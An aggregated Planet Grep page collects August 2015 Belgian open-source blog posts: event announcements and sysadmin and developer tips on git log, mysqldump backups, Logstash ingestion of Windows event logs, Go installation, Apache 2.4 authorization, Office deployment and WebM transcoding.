Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.

About Planet Grep...

Other planets can be found at the Planet Index.

A complete feed is available in a number of syndication formats: RSS 1.0, RSS 2.0, FOAF, and OPML.

The layout of this site was done by Gregory

August 26, 2015

Les Jeudis du Libre

Arlon, September 3rd, S02E01: VoIP with Asterisk

It's almost back-to-school time and, like all good things, the Jeudis du Libre of Arlon are back for a new season. For this first session, we offer a presentation of the Asterisk software and of VoIP.


Practical information

About the speaker

Thierry PIERRAT is 47 years old. Trained as an engineering technician in production engineering and new materials, he develops production management software. He started computing on an Apple II in 1983, programming in assembly. In 1994, he discovered GNU/Linux.

He co-founded Allied Data Sys. SA (ADS) with Pascal BELLARD in 2003, with the goal of building IP telephony solutions, based initially on the Bayonne / CT Server project and later on Asterisk. Today, the aim is to offer a packaged, all-in-one Open Source solution built on GNU/SliTaz, Asterisk and Odoo to manage companies' IT, telephony and administrative infrastructure.

He teaches network and IP telephony courses at the bachelor's (BAC+3) and master's (BAC+5) levels.


by Didier Villers at August 26, 2015 05:09 AM

Frank Goossens

Music from Our Tube: new Floating Points track!

Floating Points just released this on his YouTube channel;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at August 26, 2015 04:20 AM

August 25, 2015

Mattias Geniar

Pretty git log in one line


If you type git log to see the commit history in a git repository, the standard output isn't very terminal-friendly. It's a lot of text, with very little information displayed on your screen. You can, however, change the output of your git log to be more condensed and show more output on the same screen size.

By default, a git log looks like this.

$ git log

commit 3396763626316124388f76be662bd941df591118
Author: Mattias Geniar 
Date:   Fri Aug 21 09:16:26 2015 +0200

    Add twitter link

commit c73bbc98b5f55e5a4dbfee8e0297e4e1652a0687
Author: Mattias Geniar 
Date:   Wed Aug 19 09:19:37 2015 +0200

    add facebook link

Each commit is shown with its date, author and commit message. But boy, does it take up a lot of screen space.

A simple fix is to pass the --pretty=oneline parameter, which makes it all fit on a single line.

$ git log --pretty=oneline

3396763626316124388f76be662bd941df591118 Add twitter link
c73bbc98b5f55e5a4dbfee8e0297e4e1652a0687 add facebook link

It's taking up less space, but missing crucial information like the date of the commit.

There are longer versions of that same --pretty parameter. In fact, it allows you to specify all the fields you want in the output.

$ git log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit

* 3396763 - (HEAD, origin/master, master) Add twitter link (4 days ago) 
* c73bbc9 - add facebook link (6 days ago) 
* cb555df - More random values (6 days ago) 
*   60e7bbf - Merge pull request #1 from TSchuermans/patch-1 (7 days ago) 
| * 8044a8f - Typo fix (7 days ago) 

The output is indented to show branch-points and merges. In colour, it looks like this.


To make life easier, you can add a git alias so you don't have to remember the entire syntax.

$ git config --global alias.logline "log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit"
$ git logline

More data on the same screen real estate!
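If you want to experiment with the format placeholders before settling on an alias, a throwaway repository is a safe playground. This is a minimal sketch; the paths, identity and commit message are arbitrary:

```shell
# create a scratch repository and make one empty commit to format
repo=$(mktemp -d)
cd "$repo"
git init -q
git -c user.name=demo -c user.email=demo@example.com \
    commit -q --allow-empty -m "first commit"
# try a simple custom format: abbreviated hash, date, subject
git log --pretty=format:'%h %ad %s' --date=short
```

Swap placeholders in and out of the format string until the output suits your terminal.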


by Mattias Geniar at August 25, 2015 07:00 PM

Dries Buytaert

Digital Distributors vs Open Web: who will win?

I've spent a fair amount of time thinking about how to win back the Open Web. In the case of digital distributors (e.g. closed aggregators like Facebook, Google, Apple, Amazon and Flipboard), however, superior push-based user experiences have won the hearts and minds of end users, and have enabled them to attract and retain audiences in ways that individual publishers on the Open Web currently can't.

In today's world, there is a clear role for both digital distributors and Open Web publishers. Each needs the other to thrive. The Open Web provides distributors content to aggregate, curate and deliver to its users, and distributors provide the Open Web reach in return. The user benefits from this symbiosis, because it's easier to discover relevant content.

As I see it, there are two important observations. First, digital distributors have out-innovated the Open Web in terms of conveniently delivering relevant content; the usability gap between these closed distributors and the Open Web is wide, and won't be overcome without a new disruptive technology. Second, digital distributors haven't yet provided a profit motive strong enough for individual publishers to divest their websites and fully embrace distributors.

However, this raises some interesting questions for the future of the web. What does the rise of digital distributors mean for the Open Web? If distributors become successful in enabling publishers to monetize their content, is there a point at which distributors create enough value for publishers to stop having their own websites? If distributors are capturing market share because of a superior user experience, is there a future technology that could disrupt them? And the ultimate question: who will win, digital distributors or the Open Web?

I see three distinct scenarios that could play out over the next few years, which I'll explore in this post.

Digital Distributors vs Open Web: who will win?

This image summarizes different scenarios for the future of the web. Each scenario has a label in the top-left corner which I'll refer to in this blog post. A larger version of this image can be found at

Scenario 1: Digital distributors provide commercial value to publishers (A1 → A3/B3)

Digital distributors provide publishers reach, but without tangible commercial benefits, they risk being perceived as diluting or even destroying value for publishers rather than adding it. Right now, digital distributors are in early, experimental phases of enabling publishers to monetize their content. Facebook's Instant Articles currently lets publishers retain 100 percent of revenue from the ad inventory they sell. Flipboard, in efforts to stave off rivals like Apple News, has experimented with everything from publisher paywalls to native advertising as revenue models. Expect much more experimentation with different monetization models and dealmaking between the publishers and digital distributors.

If digital distributors like Facebook succeed in delivering substantial commercial value to publishers, they may fully embrace the distributor model and even divest their own websites' front-end, especially if publishers could make the vast majority of their revenue from Facebook rather than from their own websites. I'd be interested to see someone model out a business case for that tipping point. I can imagine a future upstart media company either divesting its website completely or starting from scratch to serve content directly to distributors (and being profitable in the process). This would be unfortunate news for the Open Web and would mean that content management systems need to focus primarily on multi-channel publishing, and less on their own presentation layer.

As we have seen in other industries, decoupling production from consumption in the supply chain can redefine industries. We also know that this introduces major risks, as it puts a lot of power and control in the hands of a few.

Scenario 2: The Open Web's disruptive innovation happens (A1 → C1/C2)

For the Open Web to win, the next disruptive innovation must focus on narrowing the usability gap with distributors. I've written about a concept called a Personal Information Broker (PIM) in a past post, which could serve as a way to responsibly use customer data to engineer similar personal, contextually relevant experiences on the Open Web. Think of this as unbundling Facebook: you separate the personal information management system from their content aggregation and curation platform, and make that available for everyone on the web to use. First, it would help us close the user experience gap, because you could broker your personal information with every website you visit, and every website could instantly provide you a contextual experience regardless of prior knowledge about you. Second, it would enable the creation of more distributors. I like the idea of a PIM making the era of a handful of closed distributors as short as possible. In fact, it's hard to imagine the future of the web without some sort of PIM. In a future post, I'll explore in more detail why the web needs a PIM, and what it may look like.

Scenario 3: Coexistence (A1 → A2/B1/B2)

Finally, in a third combined scenario, neither publishers nor distributors dominate, and both continue to coexist. The Open Web serves as both a content hub for distributors, and successfully uses contextualization to improve the user experience on individual websites.


Right now, since distributors are out-innovating on relevance and discovery, publishers are somewhat at their mercy for traffic. However, it remains to be seen whether the commercial incentive will ever be strong enough for publishers to divest their websites completely. I can imagine that we'll continue in a coexistence phase for some time, since it's unreasonable to expect either the Open Web or digital distributors to fail. If we work on the next disruptive technology for the Open Web, it's possible that we can shift the pendulum in favor of “open” and narrow the usability gap that exists today. If I were to guess, I'd say that we'll see a move from A1 to B2 in the next 5 years, followed by a move from B2 to C2 over the next 5 to 10 years. Time will tell!

by Dries at August 25, 2015 12:25 PM

August 24, 2015

Mattias Geniar

MySQL Back-up: Take a mysqldump with each database in its own SQL File


It's often very useful to have a couple of MySQL one-liners nearby. This guide will show you how to take a mysqldump of all databases on your server, and write each database to its own SQL file. As a bonus, I'll show you how to compress the data and import it again -- if you ever need to restore from those files.

Take a mysqldump back-up to separate files

To take a back-up, run the mysqldump tool on each available database.

$ mysql -N -e 'show databases' | while read dbname; do mysqldump --complete-insert --single-transaction "$dbname" > "$dbname".sql; done

The result is a list of all your database files, in your current working directory, suffixed with the .sql file extension.

$ ls -alh *.sql

-rw-r--r-- 1 root root  44M Aug 24 22:39 db1.sql
-rw-r--r-- 1 root root  44M Aug 24 22:39 db2.sql

If you want to write to a particular directory, like /var/dump/databases/, you can change the output of the command like this.

$ mysql -N -e 'show databases' | while read dbname; do mysqldump --complete-insert --single-transaction "$dbname" > /var/dump/databases/"$dbname".sql; done
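Note that `show databases` also lists MySQL's internal schemas, which you usually don't want in a back-up set. A possible variant skips them with a grep filter; which schema names actually appear depends on your MySQL version, so treat the list below as an assumption to adapt:

```shell
# dump all databases except MySQL's internal schemas
# (the exclusion list is an assumption; adjust for your server version)
mysql -N -e 'show databases' \
  | grep -Ev '^(information_schema|performance_schema|mysql|sys)$' \
  | while read dbname; do
      mysqldump --complete-insert --single-transaction "$dbname" > "$dbname".sql
    done
```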

Mysqldump each database and compress the SQL file

If you want to compress the files, as you're taking them, you can run either gzip or bzip on the resulting SQL file.

$ mysql -N -e 'show databases' | while read dbname; do mysqldump --complete-insert --single-transaction "$dbname" > "$dbname".sql; [[ $? -eq 0 ]] && gzip "$dbname".sql; done

The result is again a list of all your databases, but gzip'd to save diskspace.

$ ls -alh *.gz

-rw-r--r--  1 root root  30K Aug 24 22:42 db1.sql.gz
-rw-r--r--  1 root root 1.6K Aug 24 22:42 db2.sql.gz

This can save you significant disk space, at the cost of additional CPU cycles while taking the back-up.

Import files to mysql from each .SQL file

Now that you have a directory full of database dumps, each file named after its database, how can you import them all again?

The following for-loop will read all files, strip the ".sql" part from the filename and import to that database.

Warning: this overwrites your databases, without prompting for confirmation. Use with caution!

$ for sql in *.sql; do dbname=${sql/\.sql/}; echo -n "Now importing $dbname ... "; mysql $dbname < $sql; echo " done."; done

The output will tell you which database has been imported already.

$ for sql in *.sql; do dbname=${sql/\.sql/}; echo -n "Now importing $dbname ... "; mysql $dbname < $sql; echo " done."; done 

Now importing db1 ...  done.
Now importing db2 ...  done.
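Given the warning above, it can be worth previewing what the loop would do before letting it loose. Replacing the mysql invocation with echo gives a harmless dry run; I've also used `${sql%.sql}` here, which trims only a trailing suffix and is slightly safer than the substitution used above:

```shell
# dry run: print each import command instead of executing it
for sql in *.sql; do
  dbname=${sql%.sql}    # strip the trailing ".sql" suffix
  echo "mysql $dbname < $sql"
done
```

Once the printed commands look right, drop the echo and run it for real.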

These are very simple one-liners that come in handy when you're migrating from server-to-server.


by Mattias Geniar at August 24, 2015 08:52 PM

Xavier Mertens

Sending Windows Event Logs to Logstash

[The post Sending Windows Event Logs to Logstash has been first published on /dev/random]

This topic is not brand new; plenty of solutions exist to forward Windows event logs to Logstash (OSSEC, Snare or NXlog amongst many others). They do a decent job of collecting events on running systems, but they require deploying an extra piece of software on the target operating systems. For a specific case, I was looking for a solution to quickly transfer event logs from a live system without having to install extra software.

The latest versions of Microsoft Windows ship with PowerShell installed by default. PowerShell is, as defined by Wikipedia, a task automation and configuration management framework. PowerShell 3 introduced nice cmdlets to convert data from/to JSON, a format natively supported by Logstash. The goal is to have a standalone PowerShell script, executed from a share or a read-only USB stick, that processes Windows event logs and sends them to a remote, preconfigured Logstash server on a specific TCP port.

The first step is to prepare our Logstash environment to receive the new events. Let's create a new input and store received events in a dedicated index (this will make it easier to investigate the collected data):

input {
    tcp {
        port => 5001
        type => 'eventlog'
        codec => json {
            charset => 'UTF-8'
        }
    }
}

filter {
    if [type] == 'eventlog' {
        grok {
            match => [ 'TimeCreated', "Date\(%{NUMBER:timestamp}\)" ]
        }
        date {
            match => [ 'timestamp', 'UNIX_MS' ]
        }
    }
}

output {
    if [type] == 'eventlog' {
        elasticsearch {
            host => 'localhost'
            port => 9300
            node_name => 'forensics'
            cluster => 'forensics-cluster'
            index => 'logstash-eventlog-%{+YYYY.MM.dd}'
        }
    }
}

The PowerShell script collects event logs via the Get-WinEvent cmdlet and converts them to JSON format with ConvertTo-Json. Because Logstash expects one event per line, the data returned by Get-WinEvent is converted to an array and processed in a loop. Before an event is sent over the TCP session, '\r' and '\n' characters are removed. Edit the script, change the destination IP/port, and simply execute it to send a copy of all the event logs to your Logstash server (take care, it could overload your server). A few minutes later (depending on the amount of data to index), you'll be able to investigate the events from your favourite Kibana session:
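The one-event-per-line requirement is easy to mimic from a shell if you want to test the Logstash input before touching a Windows box. The sample event below is made up, and the host/port in the final comment are placeholders for your own Logstash server:

```shell
# flatten a (made-up) multi-line JSON event to a single line,
# like the PowerShell script does before writing to the TCP socket
event='{"TimeCreated":"/Date(1440417600000)/",
"Message":"test event"}'
oneline=$(printf '%s' "$event" | tr -d '\r\n')
printf '%s\n' "$oneline"
# then feed it to the TCP input defined above, e.g.:
#   printf '%s\n' "$oneline" | nc logstash.example.com 5001
```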

Events in Logstash


Some remarks:

The script is available in my repository.


by Xavier at August 24, 2015 12:30 PM

Les Jeudis du Libre

Mons, September 24 – Free software to foster interoperability in hospitals: the example of Orthanc in medical imaging

This Thursday, September 24th 2015 at 7 p.m., the 41st Mons session of the Jeudis du Libre de Belgique will take place.

The topic of this session: Free software to foster interoperability in hospitals: the example of Orthanc in medical imaging

Theme: Health

Audience: everyone

Speaker: Sébastien Jodogne (Orthanc & CHU Liège)

N.B.: Sébastien Jodogne, the Orthanc software and the CHU de Liège received awards this year:

Venue: CHU Ambroise Paré, Auditoire Leburton, Boulevard Kennedy 2, 7000 Mons. See the access directions and the OSM map.

Attendance is free and only requires registration by name, preferably in advance, or at the door. Please indicate your intention by registering via the page. The session will be followed by a friendly drink.

The Jeudis du Libre in Mons also enjoy the support of our partners: CETIC, Normation, OpenSides, MeaWeb, NextLab, Phonoid and Creative Monkeys.

If you are interested in this monthly series, don't hesitate to check the agenda and to subscribe to the mailing list in order to systematically receive the announcements.

As a reminder, the Jeudis du Libre are meant as venues for exchange around Free Software topics. The Mons sessions take place every third Thursday of the month and are organized in premises of, and in collaboration with, the Mons universities and colleges involved in training computer scientists (UMONS, HEH and Condorcet), with the support of the non-profit LoLiGrUB, which promotes free software.

Description: Over the last twenty years, the rise and subsequent democratization of new medical imaging technologies have led to profound revolutions in the clinical management of many pathologies, such as cancer or heart failure. The ever-growing volume of images that every hospital now faces creates numerous IT challenges: automatically routing images from the acquisition devices to the image analysis software, exchanges within and between hospitals, data anonymization…

Faced with these pressing collective needs, and with the lack of suitable commercial offerings, the Medical Physics Department of the CHU de Liège decided to design an innovative, industrial-grade software product. This software, named Orthanc, is a lightweight, robust and versatile medical imaging server. Orthanc has the particularity of being free software: all the hospitals in the world can therefore use it freely, in an academic, collaborative and open way.

The example of Orthanc shows that free software can bring medical departments better technological independence from their vendors. More generally, the open standards of the healthcare domain (such as FHIR and DICOM) and their free reference implementations are essential tools for creating maximal interoperability between proprietary ecosystems in the medical world, to the benefit of our healthcare system. Moreover, such interoperability is an enormous opportunity to stimulate our e-health industry, as well as to guarantee the digital freedoms of patients.

by Didier Villers at August 24, 2015 07:55 AM

August 23, 2015

Mattias Geniar

Install Go 1.5 On CentOS 6 and 7


This is a really quick guide on how to install the recently released Go 1.5 on a CentOS 6 or 7 server.

Start by grabbing the latest 1.5 release from the downloads page.

$ cd /tmp
$ wget

Extract the binary files to /usr/local/go.

$ tar -C /usr/local -xzf /tmp/go1.5.linux-amd64.tar.gz

For easy access, symlink the installed binaries in /usr/local/go to /usr/local/bin, which should be in your shell's default $PATH.

$ echo $PATH

$ ln -s /usr/local/go/bin/go /usr/local/bin/go
$ ln -s /usr/local/go/bin/godoc /usr/local/bin/godoc
$ ln -s /usr/local/go/bin/gofmt /usr/local/bin/gofmt

Alternatively, add the /usr/local/go/bin directory to your $PATH. Add the following line to your ~/.profile file.

export PATH=$PATH:/usr/local/go/bin

You now have a working go binary for version 1.5:

$ go version
go version go1.5 linux/amd64


by Mattias Geniar at August 23, 2015 08:29 PM

August 21, 2015

Mattias Geniar

Foreman 1.9: ERROR: column hosts.last_freshcheck does not exist


If you've recently upgraded your Foreman 1.8 setup to 1.9, you may see the following error in your dashboard when navigating to a particular host.

# Oops, we're sorry but something went wrong

PGError: ERROR: column hosts.last_freshcheck does not exist LINE 1: ..."name" AS t1_r1, "hosts"."last_compile" AS t1_r2, "hosts"."l... ^ : SELECT "reports"."id" AS t0_r0, "reports"."host_id" AS t0_r1, "reports"."reported_at" AS t0_r2, ...

The upgrade steps will tell you to execute the following database migrations:

$ cd /usr/share/foreman
$ foreman-rake db:migrate
$ foreman-rake db:seed

You can check whether the migrations were all executed correctly by running the following command.

$ cd /usr/share/foreman
$ foreman-rake db:migrate:status
   up     20150618093433  Remove unused fields from hosts
   up     20150622090115  Change reported at
   up     20150714140850  Remove new from compute attributes

If the output shows "up", it means that particular database migration script is up-to-date and was executed. Nothing to do here.
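With many migrations, eyeballing the list is error-prone; a small awk filter can print only the pending ones. The `foreman_status` function below is just a stand-in for the real `foreman-rake db:migrate:status` call, with sample lines mimicking the format shown above (the "down" entry is invented for the demo):

```shell
# stand-in for: cd /usr/share/foreman && foreman-rake db:migrate:status
foreman_status() {
  printf '   up     20150618093433  Remove unused fields from hosts\n'
  printf '   down   20150622090115  Change reported at\n'
  printf '   up     20150714140850  Remove new from compute attributes\n'
}

# print the IDs of migrations that have NOT been executed yet
foreman_status | awk '$1 == "down" { print $2 }'
```

In real use, pipe `foreman-rake db:migrate:status` into the same awk program; any output means you still have migrations to run.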

The error concerning the hosts.last_freshcheck column is the result of a cleanup in which obsolete columns were removed. The relevant code is found in pull request 2471.

If your database migrations are all completed and you still see the error, restart your Apache server. The Ruby/Passenger processes keep an in-memory cache of the database structure that isn't refreshed by running the foreman-rake db:migrate commands.


by Mattias Geniar at August 21, 2015 06:00 PM

Frank Goossens

Music from Our Tube, but not suited for my 9yo daughter

Don’t know where she got it from, but these last few weeks my daughter regularly chants “danger danger” to which I started replying “high voltage”.  We both laugh each time, fun times! But she’s only 9, so I decided not to show her Electric Six‘s song from which I got that reply on YouTube just yet.

You, on the other hand, are older and I hope you’re not that easily shocked (consider this a kind warning);

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at August 21, 2015 05:13 AM

August 19, 2015

Frank Goossens

It feels great to see one's children going places!


by frank at August 19, 2015 04:26 AM

August 17, 2015

Mattias Geniar

Apache 2.4: Unknown Authz provider: ip


An Apache 2.4 server with a few missing modules can show the following error in your logs.

[core:alert] [pid 1234] [client] /var/www/vhosts/site.tld/htdocs/.htaccess: Unknown Authz provider: ip, referer:

It's this kind of config that triggers it, either in your vhost configurations or in your .htaccess files.

<IfModule mod_authz_core.c>
        Require all granted
        Require not ip
</IfModule>

The idea is to use IP addresses as a means of allowing/blocking access to a particular vhost.
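For reference, a complete Apache 2.4 access-control block of this shape might look like the following. The addresses are made-up examples; note that a negative `Require not ip` must live inside a container such as `<RequireAll>`:

```apache
<IfModule mod_authz_core.c>
    <RequireAll>
        # allow a trusted range, but block one misbehaving address (example values)
        Require ip 192.0.2.0/24
        Require not ip 192.0.2.13
    </RequireAll>
</IfModule>
```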

In order for this to work, you have to load the "host" module in Apache 2.4.

To fix this, add the following in your general httpd.conf file.

$ cat /etc/httpd/conf/httpd.conf
LoadModule authz_host_module modules/

Reload your Apache and access control based on IP will work again.


by Mattias Geniar at August 17, 2015 02:37 PM

August 16, 2015

Claudio Ramirez

MS Office 365 (Click-to-Run): Remove unused applications

If you install Microsoft Office through Click-to-Run, you'll end up with the full suite installed. You can no longer select which applications you want to install. That's kind of OK, because you pay for the complete suite. Or at least the organisation (school, work, etc.) offering the subscription does. But maybe you are like me and you dislike installing applications you don't use. Or even more like me: you're a Linux user with a Windows VM you boot once in a while out of necessity. And unused applications in a VM residing on your disk are *really* annoying.

The Microsoft documentation on removing the unused applications (Access as a DB? Yeah, right…) wasn't very straightforward, so I'm posting what worked for me after the necessary trial and error. This is a small howto:

    • Install the Office Deployment Toolkit (download). The installer asks for an installation location. I put it in C:\Users\<me>\OfficeDeployTool (<me> is my username, change accordingly).
    • Create a configuration.xml with the applications you want to delete. The file should reside in the directory you chose for the Office Deployment Toolkit (e.g. C:\Users\<me>\OfficeDeployTool\configuration.xml), or you should refer to the file with its full path name. If you run the 64-bit Office version, change OfficeClientEdition="32" to OfficeClientEdition="64".
      You can find the full list of AppIDs here. Add or remove ExcludeApps as desired. The content of the file in my case was as follows:
      <Configuration>
        <Add SourcePath="C:\Users\<me>\OfficeDeployTool" OfficeClientEdition="32">
          <Product ID="O365ProPlusRetail">
            <Language ID="en-us" />
            <ExcludeApp ID="Access" />
            <ExcludeApp ID="Groove" />
            <ExcludeApp ID="InfoPath" />
            <ExcludeApp ID="Lync" />
            <ExcludeApp ID="OneNote" />
            <ExcludeApp ID="Outlook" />
            <ExcludeApp ID="Project" />
            <ExcludeApp ID="Publisher" />
            <ExcludeApp ID="SharePointDesigner" />
          </Product>
        </Add>
        <Updates Enabled="TRUE"/>
        <Display Level="None" AcceptEULA="TRUE" />
        <Property Name="FORCEAPPSHUTDOWN" Value="TRUE" />
        <!-- <Property Name="AUTOACTIVATE" Value="1" /> -->
      </Configuration>
    • Download the office components. Type in a cmd box:
      C:\Users\<me>\OfficeDeployTool>setup.exe /download configuration.xml
    • Remove the unwanted applications:
      C:\Users\<me>\OfficeDeployTool>setup.exe /configure configuration.xml
    • Delete (if you want) the Office Deployment Toolkit directory (that includes the downloaded office components)

Enjoy the space (if you are using a VM don’t forget to defragment and compact the Virtual Hard Disk to reclaim the space) and the faster updates.

Filed under: Uncategorized Tagged: Click-to-Run, MS Office 365, VirtualBox, vm, VMWare, Windows

by claudio at August 16, 2015 07:07 PM

Frank Goossens

No Google fonts with NoScript

I’m not only into optimizing the speed of sites for the benefit of their visitors, but also into speeding up all sites in my browser, to satisfy my own impatience. I already blocked Facebook, Twitter and Google+ widgets using NoScript’s ABE, and now added this little snippet to ABE’s user ruleset to stop Google Fonts from being loaded;

# no google fonts

Result: fewer requests, less to download and faster rendering without that ugly FOUT. Because let’s face it: your fancy fonts slow down the web and they are of no interest to me.
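The body of the ruleset was lost in syndication above; an ABE user rule of that shape typically looks like the following (the host names are an assumption on my part; adapt them to whatever font hosts show up in your network panel):

```
# no google fonts
Site fonts.googleapis.com fonts.gstatic.com
Deny
```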

by frank at August 16, 2015 09:14 AM

Dag Wieers

Try this if you fail to (re)install Google Picasa on Windows

Today I lost quite some time figuring out why Google Picasa did not work correctly. Even though the latest version *was* installed already, it proposed to download and install an update.

So the recommended way to fix Picasa issues is to uninstall and reinstall. Unfortunately the uninstall went fine, but it wouldn't reinstall. Even when every possible Picasa directory was (temporarily for the sake of hypothesis) removed. To no avail.

On Linux I would strace/ltrace the process in order to see what's going on. On Windows you have a Sysinternals tool named procmon.exe. It can trace similar things, like file accesses and registry manipulations. At first sight nothing seemed to be wrong, but looking closer I noticed it was successfully accessing the key \HKLM\SOFTWARE\Wow6432Node\Google\Picasa\Installed Version, which contained the version of Google Picasa that had actually been removed from the system. Weird!

After removing the whole \HKLM\SOFTWARE\Wow6432Node\Google\Picasa tree, the picasa39-setup.exe installer worked correctly again and Picasa installed fine afterwards.

I hope this is useful to someone so that the time I lost is somehow not completely wasted... Sigh...

by dag at August 16, 2015 12:14 AM

August 14, 2015

Wouter Verhelst

Multi-pass transcoding to WebM with normalisation

Transcoding video from one format to another seems to be a bit of a black art. There are many tools that allow doing this kind of stuff, but one issue that most seem to have is that they're not very well documented.

I ran into this a few years ago, when I was first doing video work for FOSDEM and did not yet have proper tools for the review and transcoding workflow.

At the time, I just used mplayer to look at the .dv files, and wrote a text file with a simple structure to remember exactly what to do with it. That file was then fed to a perl script which wrote out a shell script that would use the avconv command to combine and extract the "interesting" data from the source DV files into a single DV file per talk, and which would then call a shell script which used gst-launch and sox to do a multi-pass transcode of those intermediate DV files into a WebM file.

While all that worked properly, it was a rather ugly hack, never cleaned up, and therefore I never really documented it properly either. Recently, however, someone asked me to do so anyway, so here goes. Before you want to complain about how this ate the videos of your firstborn child, however, note the above.

The perl script spends a somewhat large amount of code reading the text file and parsing it into an array of hashes. I'm not going to reproduce that, since the actual format of the file isn't all that important anyway. However, here are the interesting bits:

foreach my $pfile(keys %parts) {
        my @files = @{$parts{$pfile}};

        say "#" x (length($pfile) + 4);
        say "# " . $pfile . " #";
        say "#" x (length($pfile) + 4);
        foreach my $file(@files) {
                my $start = "";
                my $stop = "";

                if(defined($file->{start})) {
                        $start = "-ss " . $file->{start};
                }
                if(defined($file->{stop})) {
                        $stop = "-t " . $file->{stop};
                }
                if(defined($file->{start}) && defined($file->{stop})) {
                        my @itime = split /:/, $file->{start};
                        my @otime = split /:/, $file->{stop};
                        # turn the absolute stop time into a duration for -t;
                        # the subtraction and borrow handling were lost in
                        # syndication and are reconstructed here
                        $otime[0] -= $itime[0];
                        $otime[1] -= $itime[1];
                        $otime[2] -= $itime[2];
                        if($otime[2]<0) {
                                $otime[1]--;
                                $otime[2] += 60;
                        }
                        if($otime[1]<0) {
                                $otime[0]--;
                                $otime[1] += 60;
                        }
                        $stop = "-t " . $otime[0] . ":" . $otime[1] .  ":" . $otime[2];
                }
                if(defined($file->{start}) || defined($file->{stop})) {
                        say "ln " . $file->{name} . ".dv part-pre.dv";
                        say "avconv -i part-pre.dv $start $stop -y -acodec copy -vcodec copy part.dv";
                        say "rm -f part-pre.dv";
                } else {
                        say "ln " . $file->{name} . ".dv part.dv";
                }
                say "cat part.dv >> /tmp/" . $pfile . ".dv";
                say "rm -f part.dv";
        }
        say "dv2webm /tmp/" . $pfile . ".dv";
        say "rm -f /tmp/" . $pfile . ".dv";
        say "scp /tmp/" . $pfile . ".webm $uploadpath || true";
        say "mv /tmp/" . $pfile . ".webm .";
}

That script uses avconv to read one or more .dv files and transcode them into a single .dv file with all the start- or end-junk removed. It uses /tmp rather than the working directory, since the working directory was somewhere on the network, and if you're going to write several gigabytes of data to an intermediate file, it's usually a good idea to write them to a local filesystem rather than to a networked one.

Pretty boring.

It finally calls dv2webm on the resulting .dv file. That script looks like this:


#!/bin/bash
set -e

newfile=$(basename $1 .dv).webm
wavfile=$(basename $1 .dv).wav
wavfile=$(readlink -f $wavfile)
normalfile=$(basename $1 .dv)-normal.wav
normalfile=$(readlink -f $normalfile)
oldfile=$(readlink -f $1)

echo -e "\033]0;Pass 1: $newfile\007"
gst-launch-0.10 webmmux name=mux ! fakesink \
  uridecodebin uri=file://$oldfile name=demux \
  demux. ! ffmpegcolorspace ! deinterlace ! vp8enc multipass-cache-file=/tmp/vp8-multipass multipass-mode=1 threads=2 ! queue ! mux.video_0 \
  demux. ! progressreport ! audioconvert ! audiorate ! tee name=t ! queue ! vorbisenc ! queue ! mux.audio_0 \
  t. ! queue ! wavenc ! filesink location=$wavfile
echo -e "\033]0;Audio normalize: $newfile\007"
sox --norm $wavfile $normalfile
echo -e "\033]0;Pass 2: $newfile\007"
gst-launch-0.10 webmmux name=mux ! filesink location=$newfile \
  uridecodebin uri=file://$oldfile name=video \
  uridecodebin uri=file://$normalfile name=audio \
  video. ! ffmpegcolorspace ! deinterlace ! vp8enc multipass-cache-file=/tmp/vp8-multipass multipass-mode=2 threads=2 ! queue ! mux.video_0 \
  audio. ! progressreport ! audioconvert ! audiorate ! vorbisenc ! queue ! mux.audio_0

rm $wavfile $normalfile

... and is a bit more involved.

Multi-pass encoding of video means that we ask the encoder to first encode the file but store some statistics into a temporary file (/tmp/vp8-multipass, in our script), which the second pass can then reuse to optimize the transcoding. Since DV uses different ways of encoding things than does VP8, we also need to do a color space conversion (ffmpegcolorspace) and deinterlacing (deinterlace), but beyond that the video line in the first gstreamer pipeline isn't very complicated.

Since we're going over the file anyway and we need the audio data for sox, we add a tee plugin at an appropriate place in the audio line of the first gstreamer pipeline, so that we can later pick up that same audio data and write it to a wav file containing linear PCM data. Beyond the tee, we go on and do a vorbis encoding, as is needed for the WebM format. This is not actually required for a first pass, but ah well. There are a few more conversion plugins in the pipeline (specifically, audioconvert and audiorate), but those are not very important.

We next run sox --norm on the .wav file, which does a fully automated audio normalisation on the input. Audio normalisation is the process of adjusting volume levels so that the audio is not too loud, but also not too quiet. Sox has pretty good support for this; the default settings of its --norm parameter make it adjust the volume levels so that the highest peak will just about reach the highest value that the output format can express. As such, you have no clipping anywhere in the file, but also have an audio level that is actually useful.

Next, we run a second-pass encoding on the input file. This second pass uses the statistics gathered in the first pass to decide where to put its I- and P-frames so that they are placed at the most optimal position. In addition, rather than reading the audio from the original file, we now read the audio from the .wav file containing the normalized audio which we produced with sox, ensuring the audio can be understood.

Finally, we remove the intermediate audio files we created; and the shell script which was generated by perl also contained an rm command for the intermediate .dv file.

Some of this is pretty horrid, and I never managed to clean it up enough so it would be pretty (and now is not really the time). However, it Just Works(tm), and I am happy to report that it continues to work with gstreamer 1.0, provided you replace ffmpegcolorspace with the equally simple videoconvert, which does in gstreamer 1.0 what ffmpegcolorspace did in gstreamer 0.10.

August 14, 2015 07:33 PM

Ruben Vermeersch

Custom attributes in angular-gettext

Kristiyan Kostadinov recently submitted a very neat new feature for angular-gettext, which was just merged: support for custom attributes.

This feature allows you to mark additional attributes for extraction. This is very handy if you’re always adding translations for the same attributes over and over again.

For example, if you’re always doing this:

<input placeholder="{{ 'Input something here' | translate }}">

You can now mark placeholder as a translatable attribute. You’ll need to define your own directive to do the actual translation (an example is given in the documentation), but it’s now a one-line change in the options to make sure that placeholder gets recognized and hooked into the whole translation string cycle.

Your markup will then become:

<input placeholder="Input something here">

And it’ll still internationalize nicely. Sweet!

You can get this feature by updating your grunt-angular-gettext dependency to at least 2.1.3.

Full usage instructions can be found in the developer guide.

Comments | More on | @rubenv on Twitter

August 14, 2015 08:15 AM

August 13, 2015

Mattias Geniar

iPhone’s “Field Test” debug screen: Dial *3001#12345#* for the real signal strength

The post iPhone’s “Field Test” debug screen: Dial *3001#12345#* for the real signal strength appeared first on

I didn't know it was a thing, but apparently the iPhone has a "Field Test" hidden menu you can use to see all kinds of diagnostics about your cell reception, including the actual signal strength in dB, instead of just the 5 dots that average things out.

This is what is usually looks like on your iPhone.


